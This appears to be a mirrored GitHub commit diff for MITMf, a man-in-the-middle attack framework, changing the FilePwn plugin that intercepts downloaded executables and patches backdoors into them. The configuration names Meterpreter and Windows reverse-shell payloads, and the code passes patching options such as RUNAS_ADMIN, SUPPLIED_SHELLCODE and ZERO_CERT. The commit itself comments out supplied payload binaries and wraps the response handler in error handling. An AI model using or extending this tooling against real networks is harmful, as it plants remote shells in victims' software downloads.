mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-06 13:02:24 -07:00
Merge 40957791e9
into d542dc139f
This commit is contained in:
commit
e69361d8ce
2 changed files with 11 additions and 12 deletions
|
@ -457,10 +457,10 @@
|
|||
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
|
||||
RUNAS_ADMIN = False
|
||||
# XP_MODE - to support XP targets
|
||||
XP_MODE = True
|
||||
#XP_MODE = True
|
||||
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
|
||||
# with PATCH_METHOD 'replace' use an EXE not DLL
|
||||
SUPPLIED_BINARY = veil_go_payload.exe
|
||||
#SUPPLIED_BINARY = veil_go_payload.exe
|
||||
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||
|
||||
[[[[WindowsIntelx64]]]]
|
||||
|
@ -479,7 +479,7 @@
|
|||
RUNAS_ADMIN = False
|
||||
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
|
||||
# with PATCH_METHOD 'replace' use an EXE not DLL
|
||||
SUPPLIED_BINARY = pentest_x64_payload.exe
|
||||
#SUPPLIED_BINARY = pentest_x64_payload.exe
|
||||
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
||||
|
||||
[[[[MachoIntelx86]]]]
|
||||
|
|
|
@ -374,12 +374,11 @@ class FilePwn(Plugin):
|
|||
ADD_SECTION=add_section,
|
||||
CAVE_JUMPING=cave_jumping,
|
||||
IMAGE_TYPE=self.WindowsType,
|
||||
RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
|
||||
CHECK_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
|
||||
PATCH_DLL=self.str2bool(self.WindowsIntelx64['PATCH_DLL']),
|
||||
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
||||
ZERO_CERT=self.str2bool(self.WindowsIntelx64['ZERO_CERT']),
|
||||
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower(),
|
||||
SUPPLIED_BINARY=self.WindowsIntelx64['SUPPLIED_BINARY'],
|
||||
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
||||
)
|
||||
|
||||
result = targetFile.run_this()
|
||||
|
@ -408,13 +407,11 @@ class FilePwn(Plugin):
|
|||
ADD_SECTION=add_section,
|
||||
CAVE_JUMPING=cave_jumping,
|
||||
IMAGE_TYPE=self.WindowsType,
|
||||
RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
|
||||
CHECK_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
|
||||
PATCH_DLL=self.str2bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||
ZERO_CERT=self.str2bool(self.WindowsIntelx86['ZERO_CERT']),
|
||||
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower(),
|
||||
SUPPLIED_BINARY=self.WindowsIntelx86['SUPPLIED_BINARY'],
|
||||
XP_MODE=self.str2bool(self.WindowsIntelx86['XP_MODE'])
|
||||
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
||||
)
|
||||
|
||||
result = targetFile.run_this()
|
||||
|
@ -610,7 +607,7 @@ class FilePwn(Plugin):
|
|||
self.log.debug("Updating Config {0}: {1}".format(key, value))
|
||||
|
||||
def response(self, response, request, data):
|
||||
|
||||
try:
|
||||
content_header = response.headers['content-type']
|
||||
client_ip = request.client.getClientIP()
|
||||
host = request.headers['host']
|
||||
|
@ -675,3 +672,5 @@ class FilePwn(Plugin):
|
|||
self.clientlog.warning("Returning original file", extra=request.clientInfo)
|
||||
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
except:
|
||||
self.clientlog.error('Filepwn failed to response this request', extra=request.clientInfo)
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue